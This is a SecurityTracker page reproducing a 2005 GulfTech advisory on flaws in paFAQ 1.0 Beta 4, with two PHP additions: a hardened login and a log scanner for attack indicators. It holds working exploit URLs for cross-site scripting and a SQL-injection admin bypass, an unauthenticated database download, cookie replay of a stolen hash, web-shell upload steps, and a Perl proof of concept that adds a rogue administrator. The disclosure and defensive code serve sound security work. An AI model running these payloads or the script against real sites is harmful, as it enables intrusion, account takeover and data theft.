SecurityTracker.com
Category:   Application (Generic)  >   paFAQ
Vendors:   PHP Arena
paFAQ Flaws Let Remote Users Download the Database, Inject SQL Commands, Conduct Cross-Site Scripting Attacks, and Execute Arbitrary Code
SecurityTracker Alert ID:  1014248
SecurityTracker URL:  http://securitytracker.com/id/1014248
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 21 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network

Version(s): 1.0 Beta 4
Description:   Several vulnerabilities were reported in paFAQ. A remote user can conduct cross-site scripting attacks. A remote user can inject SQL commands to gain administrative access. A remote user can download the database and then gain administrative access. A remote authenticated administrator can execute arbitrary code on the target system.

Several scripts do not properly validate user-supplied input to filter HTML code before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the paFAQ software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/index.php?act=Question&id=1%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

If magic quotes gpc is set to be off a remote user can inject SQL commands. This can be exploited, for example, to gain administrative access to the target application. A demonstration exploit URL is provided:

http://[target]/admin/index.php?act=login&username='%20UNION%20SELECT%20id,name,'3858f62230ac3c915f300c664312c63f',email,notify,permissions,session%20FROM%20pafaq_admins%20WHERE%201/*&password=foobar

The 'id' parameter in most of the scripts is also affected.

A remote user can supply the following type of URL to download the entire database:

http://[target]/path/to/pafaq/admin/backup.php

With a copy of the database, a remote user can use the administrative username and hashed administrative password in a cookie ('pafaq_user' and 'pafaq_pass') to gain administrative access on the target system.
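The login excerpt and the cookie scheme described above share one root cause: user input is spliced into SQL, and the password hash itself is then handed out as the credential. The following is an added example, not paFAQ's own code, showing a hardened replacement for that admin login. It assumes a PDO/MySQL connection and a table pafaq_admins(id, name, password) in which the password column holds a password_hash() value instead of an md5 digest; the function names are hypothetical, while PDO, password_hash/password_verify, htmlspecialchars and the session_* calls are standard PHP.

```php
<?php
// Added example, not paFAQ code: hardened admin login for the excerpt quoted
// in the advisory. Assumed schema: pafaq_admins(id, name, password), where
// `password` stores a password_hash() value rather than md5. Function names
// are hypothetical; everything else is standard PHP.

declare(strict_types=1);

// Throwaway hash so a login attempt against an unknown username costs about
// the same time as one against a real username (no username enumeration).
define('DUMMY_HASH', password_hash('not-a-real-password', PASSWORD_DEFAULT));

function open_pdo(string $dsn, string $user, string $pass): PDO
{
    return new PDO($dsn, $user, $pass, [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
    ]);
}

// Set or reset an admin password: store a salted, slow hash, never md5.
function set_admin_password(PDO $pdo, int $adminId, string $plain): void
{
    $stmt = $pdo->prepare('UPDATE pafaq_admins SET password = :hash WHERE id = :id');
    $stmt->execute([':hash' => password_hash($plain, PASSWORD_DEFAULT), ':id' => $adminId]);
}

// Returns the admin row on success, null on failure. The username travels as a
// bound parameter, so a value like "' UNION SELECT ..." is compared as a
// literal name instead of becoming part of the query text.
function admin_login(PDO $pdo, string $username, string $password): ?array
{
    $stmt = $pdo->prepare('SELECT id, name, password FROM pafaq_admins WHERE name = :name LIMIT 1');
    $stmt->execute([':name' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($row === false) {
        password_verify($password, DUMMY_HASH); // equalise timing, then fail
        return null;
    }
    // password_verify is a constant-time check of a salted hash, replacing the
    // md5() == comparison in the original code.
    if (!password_verify($password, $row['password'])) {
        return null;
    }
    // Login state lives server-side. The cookie carries only a random session
    // id, so a dump of the database no longer yields a reusable credential the
    // way the pafaq_pass hash cookie did.
    session_regenerate_id(true);
    $_SESSION['admin_id'] = (int) $row['id'];
    return ['id' => (int) $row['id'], 'name' => $row['name']];
}

// Guard for admin-only scripts (backup.php among them).
function require_admin(): int
{
    if (!isset($_SESSION['admin_id'])) {
        http_response_code(403);
        exit('admin login required');
    }
    return (int) $_SESSION['admin_id'];
}

// Output encoding for reflected values such as the `id` parameter from the
// cross-site scripting section.
function html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Usage sketch (DSN and credentials are placeholders):
// session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
// session_start();
// $pdo   = open_pdo('mysql:host=localhost;dbname=pafaq;charset=utf8mb4', 'dbuser', 'dbpass');
// $admin = admin_login($pdo, (string) ($_POST['username'] ?? ''), (string) ($_POST['password'] ?? ''));
// echo html((string) ($_GET['id'] ?? ''));
```

Two design points worth noting: the dummy-hash branch keeps the response time of a failed login independent of whether the username exists, and moving the credential out of the cookie means that even a full database download (the backup.php issue) gives an attacker hashes to crack rather than a token to replay.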

A remote authenticated administrator can upload arbitrary PHP scripting code in place of a language pack file and then have the web server execute the code. The code will run with the privileges of the target web service.

The vendor was notified without response.

James Bercegay of the GulfTech Security Research Team discovered this vulnerability.

The original advisory is available at:

http://www.gulftech.org/?node=research&article_id=00083-06202005

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the paFAQ software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

A remote user can download the database and then gain administrative access.

A remote authenticated administrator can execute arbitrary code on the target system with the privileges of the target web service.
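Every issue in this advisory leaves a recognisable trace in the web server's access log: the reflected script in the `id` parameter, a `UNION SELECT` in the login query string, an unauthenticated hit on `admin/backup.php`, and a direct request to a script under `/lang/` with a `cmd` parameter. The following is an added example, not part of the advisory, that scans combined-format access-log lines for those indicators. The log lines are constructed samples and the rule names are my own.

```php
<?php
// Added example, not part of the advisory: flag access-log entries that match
// the indicators described for paFAQ. SAMPLE_LOG is constructed test data in
// Apache combined log format; rule names are invented for this example.

declare(strict_types=1);

const SAMPLE_LOG = <<<'LOG'
203.0.113.5 - - [21/Jun/2005:10:00:01 +0000] "GET /pafaq/index.php?act=Question&id=1 HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.9 - - [21/Jun/2005:10:00:02 +0000] "GET /pafaq/index.php?act=Question&id=1%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E HTTP/1.1" 200 1601 "-" "Mozilla/5.0"
203.0.113.9 - - [21/Jun/2005:10:00:03 +0000] "GET /pafaq/admin/index.php?act=login&username=%27%20UNION%20SELECT%201/*&password=foobar HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [21/Jun/2005:10:00:04 +0000] "GET /pafaq/admin/backup.php HTTP/1.1" 200 88213 "-" "paFaq Hash Grabber v1.0"
203.0.113.9 - - [21/Jun/2005:10:00:05 +0000] "GET /pafaq/lang/pafaq.php?cmd=id HTTP/1.1" 200 57 "-" "Mozilla/5.0"
LOG;

// Pull client IP, method, request target, status and user agent out of one
// combined-format line; returns null for lines that do not parse.
function parse_request(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-) "[^"]*" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'method' => $m[2], 'target' => $m[3],
            'status' => (int) $m[4], 'ua' => $m[6]];
}

// Returns one finding per (line, rule) pair: line number, client IP, rule, UA.
function scan_access_log(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $n => $line) {
        $req = parse_request($line);
        if ($req === null) {
            continue;
        }
        $path  = (string) (parse_url($req['target'], PHP_URL_PATH) ?? '');
        // Decode once so %3C, %27, %20 and '+' compare as the characters the
        // application would actually see.
        $query = urldecode((string) (parse_url($req['target'], PHP_URL_QUERY) ?? ''));

        $rules = [];
        if (preg_match('~/admin/backup\.php$~', $path)) {
            $rules[] = 'backup_download';   // unauthenticated database dump
        }
        if (preg_match('/union\s+select/i', $query)) {
            $rules[] = 'sqli_union';        // login bypass / id parameter injection
        }
        if (preg_match('/<\s*script/i', $query)) {
            $rules[] = 'xss_script';        // reflected script in a parameter
        }
        if (preg_match('~/lang/[^/]+\.php$~', $path) && preg_match('/(^|&)cmd=/', $query)) {
            $rules[] = 'lang_webshell';     // language-pack script called directly with cmd=
        }
        foreach ($rules as $rule) {
            $findings[] = ['line' => $n + 1, 'ip' => $req['ip'], 'rule' => $rule, 'ua' => $req['ua']];
        }
    }
    return $findings;
}

if (PHP_SAPI === 'cli') {
    // Expected on the sample: xss_script (2), sqli_union (3), backup_download (4), lang_webshell (5)
    foreach (scan_access_log(SAMPLE_LOG) as $f) {
        printf("line %d  %-12s %-16s ua=\"%s\"\n", $f['line'], $f['ip'], $f['rule'], $f['ua']);
    }
}
```

These are indicators, not proof: a legitimate administrator also requests backup.php, so correlate the `backup_download` rule with whether an admin session existed for that client, and treat the other three as high-confidence since no normal paFAQ request carries a script tag, a `UNION SELECT`, or a `cmd` parameter aimed at a language file.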

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phparena.net/pafaq.php
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


Source Message Contents

Subject:  paFaq Multiple Vulnerabilities



##########################################################
# GulfTech Security Research           June 20th, 2005
##########################################################
# Vendor  : php Arena
# URL     : http://www.phparena.net/pafaq.php
# Version : paFAQ 1.0 Beta 4
# Risk    : Multiple Vulnerabilities
##########################################################



Description:
paFAQ is a FAQ/Knowledge base system that allows webmasters to
keep an organized database of Frequently Asked Questions; a
Knowledge Database for problems and solutions. There are a number
of vulnerabilities in paFaq. These vulnerabilities include
arbitrary unauthorized access to the entire paFaq database, as
well as admin authentication bypass, sql injection, arbitrary
code execution and cross site scripting. An attacker can gain a
remote shell on a vulnerable system using these vulnerabilities.



Cross Site Scripting:
There are some cross site scripting issues in the paFaq software. The
majority of these cross site scripting issues stem from input
variables never being sanitized properly.

http:///pafaq/index.php?act=Question&id=1%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

These vulnerabilities can be used to render hostile code in the
context of the victim's browser, and in turn disclose sensitive
information to an attacker.



SQL Injection:
There are a number of SQL Injection vulnerabilities in paFaq,
but it should be noted that to exploit these issues magic quotes
gpc must be off. Also, magic quotes off seems to be the default
php.ini setting now, so I do consider these issues fairly high
risk. The most serious of the SQL Injection issues lies in the
administrative login.

$username = $_REQUEST['username'];
$password = md5($_REQUEST['password']);

// $username is concatenated straight into the SQL text: the injection point.
$q = $DB->query("SELECT * FROM " . $DB->obj['tbl_pre'] . "admins WHERE name = '" . $username . "'");
$r = $DB->fetch_row($q);

// Unsalted md5 compared with a loose == against whatever row the query returned.
if ($r['password'] == $password) {

    $t = time();
    $DB->query("UPDATE " . $DB->obj['tbl_pre'] . "admins SET session='$t' WHERE id='" . $r['id'] . "'");
    // The md5 hash itself becomes the credential: anyone holding it is admin.
    setcookie("pafaq_user", $username, time()+3600);
    setcookie("pafaq_pass", $password, time()+3600);
    // (remainder of the login handler omitted in the advisory)
}

The variable $username is taken directly from the submitted login form
and executed in the query, so if magic quotes gpc is off an attacker can
use UNION SELECT to bypass admin authentication!

http://pafaq/admin/index.php?act=login&username='%20UNION%20SELECT%20id,name,'3858f62230ac3c915f300c664312c63f',email,notify,permissions,session%20FROM%20pafaq_admins%20WHERE%201/*&password=foobar

The query above uses a UNION SELECT to get the admin username, id, email etc
but we specify the password hash as the md5 encrypted value of the $password
variable. If the host is vulnerable then the above link will log an attacker
in as the first admin in the selected table. Additionally the "id" parameter
in most of the scripts is vulnerable to SQL Injection, and can be exploited
when magic quotes gpc is set to off.



Arbitrary Database Download:
A very dangerous vulnerability lies in paFaq that will allow an attacker
to download the entire paFaq database. A user does not have to be logged in
to exploit this vulnerability either, thus making it that much more dangerous.

http://path/to/pafaq/admin/backup.php

An attacker can then use the encrypted password hash to gain administrative
access; there is no need for an attacker to decrypt it.

Cookie: pafaq_user=USERNAMEHERE; pafaq_pass=PASSWORDHASH

By adding the above cookie with the required values taken from the
downloaded database an attacker now has admin access to the affected
paFaq installation.



Arbitrary Code Execution:
Once an attacker has administrative access to the website he can execute any
arbitrary php code by taking advantage of the "upload a language pack"
feature. The script does check for a "valid" language pack, but if an
attacker, for example, takes the default en.php file in the language
directory, adds a simple passthru($_GET['cmd']) at the bottom of the page,
and then uploads the modified en.php after renaming it to something like
pafaq.php as a new language pack, he will be able to execute shell commands
on the affected webserver by calling the malicious script in the /lang/
directory. Example: /lang/pafaq.php?cmd=id;pwd



Solution:
The developers were contacted and never responded. A quick workaround
would be to delete the backup.php script and turn magic quotes gpc on,
or better yet use a more secure application if deployed live on the web.



Related Info:
The original advisory can be found at the following location:
http://www.gulftech.org/?node=research&article_id=00083-06202005



Credits:
James Bercegay of the GulfTech Security Research Team

Attachment: pafaq.pl

#!/usr/bin/perl -w
##########################################################################
# paFaq 1.0 Add Administrator PoC // By James // http://www.gulftech.org
##########################################################################

use LWP::UserAgent;

# Set up the LWP User Agent
$ua = new LWP::UserAgent;
$ua->agent("paFaq Hash Grabber v1.0");

if ( !$ARGV[0] ) { print "Usage : pafaq.pl http://path/to/pafaq"; exit; }

my $key_time = time();

my $dbm_path = $ARGV[0] . '/admin/backup.php';
my $add_user = 'pafaq'; # change this?
my $add_pass = 'pafaq'; # change this?
my $add_email = 'pafaq@dev.null'; # change this?
my $add_path = $ARGV[0] . '/admin/index.php?area=users&act=doadd&name=' . $add_user . '&password=' . $add_pass . '&email=' . $add_email
 . '&notify=1&can_edit_settings=1&can_edit_admins=1&can_add_admins=1&can_del_admins=1&is_a_admin=1';

print "[*] Trying Host " . $ARGV[0] . "\n";

my $dbm = $ua->get($dbm_path);

if ( $dbm->content =~ /'([0-9]{1,8})',\s'(.*)',\s'([a-f0-9]{32})'/i)
{
	print "[+] User ID Is " . $1 . "\n";
	print "[+] User Name Is " . $2 . "\n";
	print "[+] User Password Is " . $3 . "\n";
	print "[*] Trying to add new user ...\n";
	
	my @cookie = ('Cookie' => 'pafaq_user=' . $2 . '; pafaq_pass=' . $3);
	my $add = $ua->get($add_path, @cookie);
	
	if ( $add->content =~ /has been created successfully/ )
	{
		print "[+] User $add_user Added Successfully!\n";
		print "[+] User Password Is $add_pass\n";		
	}
	else
	{
		print "[!] Unable To Add User! Maybe the username is already taken? ...\n";
		print "[!] Shutting Down ...\n";
		exit;	
	}
}
else
{
	print "[!] The Host Is Not Vulnerable ...\n";
	print "[!] Shutting Down ...\n";
	exit;
}
exit;


 
 


Copyright 2021, SecurityGlobal.net LLC